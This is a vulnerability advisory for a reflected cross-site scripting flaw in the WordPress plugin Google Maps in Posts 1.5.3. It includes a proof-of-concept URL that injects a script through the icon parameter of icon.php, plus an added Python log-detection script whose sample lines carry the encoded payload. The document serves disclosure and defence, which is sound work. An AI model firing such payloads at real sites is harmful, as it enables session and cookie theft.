Plugin Details
Plugin Name: wp-plugin : google-maps-in-posts
Affected Version : 1.5.3 (and most probably lower versions, if any)
Vulnerability : Cross-Site Scripting (XSS)
Identified by : anantshri
Technical Details
Minimum Level of Access Required : Unauthenticated
PoC - (Proof of Concept) :
http://localhost/wp-content/plugins/google-maps-in-posts/icons/icon.php?icon=icon"><script>alert(document.cookie)</script>&
Vulnerable Parameter : icon
Type of XSS : Reflected
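Added example (not part of the original advisory or the plugin's code): a log check that flags requests to the affected icon.php whose icon value, decoded once, falls outside a conservative allowlist. The allowlist pattern, the combined access-log format and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Endpoint and parameter taken from the advisory's PoC.
VULN_PATH = "/wp-content/plugins/google-maps-in-posts/icons/icon.php"
PARAM = "icon"
# Assumption: a legitimate icon name is a short token of these characters.
SAFE_VALUE = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines; line 2 is the PoC as a browser would encode it.
SAMPLE_LOG = [
    '203.0.113.5 - - [07/Jul/2014:10:00:01 +0000] "GET /wp-content/plugins/'
    'google-maps-in-posts/icons/icon.php?icon=marker_red HTTP/1.1" 200 512',
    '203.0.113.9 - - [07/Jul/2014:10:00:07 +0000] "GET /wp-content/plugins/'
    'google-maps-in-posts/icons/icon.php?icon=icon%22%3E%3Cscript%3Ealert'
    '(document.cookie)%3C/script%3E& HTTP/1.1" 200 540',
    '203.0.113.9 - - [07/Jul/2014:10:00:09 +0000] "GET /blog/wp-content/plugins/'
    'google-maps-in-posts/icons/icon.php?icon=x%2522%253E HTTP/1.1" 200 540',
    '198.51.100.2 - - [07/Jul/2014:10:01:00 +0000] "GET /index.php?icon=%3Cb%3E'
    ' HTTP/1.1" 200 1024',
]

def suspicious_requests(log_lines):
    """Return (line_number, decoded_value) for icon.php requests whose
    'icon' value does not match the allowlist."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        path, _, query = m.group(1).partition("?")
        # endswith() also covers WordPress installed in a subdirectory.
        if not unquote(path).endswith(VULN_PATH):
            continue
        # parse_qs decodes once; a double-encoded value keeps its '%' and
        # therefore still fails the allowlist.
        for value in parse_qs(query).get(PARAM, []):
            if not SAFE_VALUE.fullmatch(value):
                hits.append((n, value))
    return hits

if __name__ == "__main__":
    for n, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {n}: icon={value!r}")
```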
Disclosure Timeline
Vendor Contacted : 2014-01-05
Plugin Status : Updated on
Public Disclosure : July 7, 2014
CVE Number :
Plugin Description :
Google Maps in Posts plugin for WordPress gives the possibility to use Google Maps Services in your blog.
That could be useful for posts in WP, describing certain locations or events,
to indicate them immediately in the WP post with a map. The Google Maps Plugin
gives you a simple and easy WordPress administration back end to handle multiple
locations and your own location would be defined only once for all the maps of your WP blog.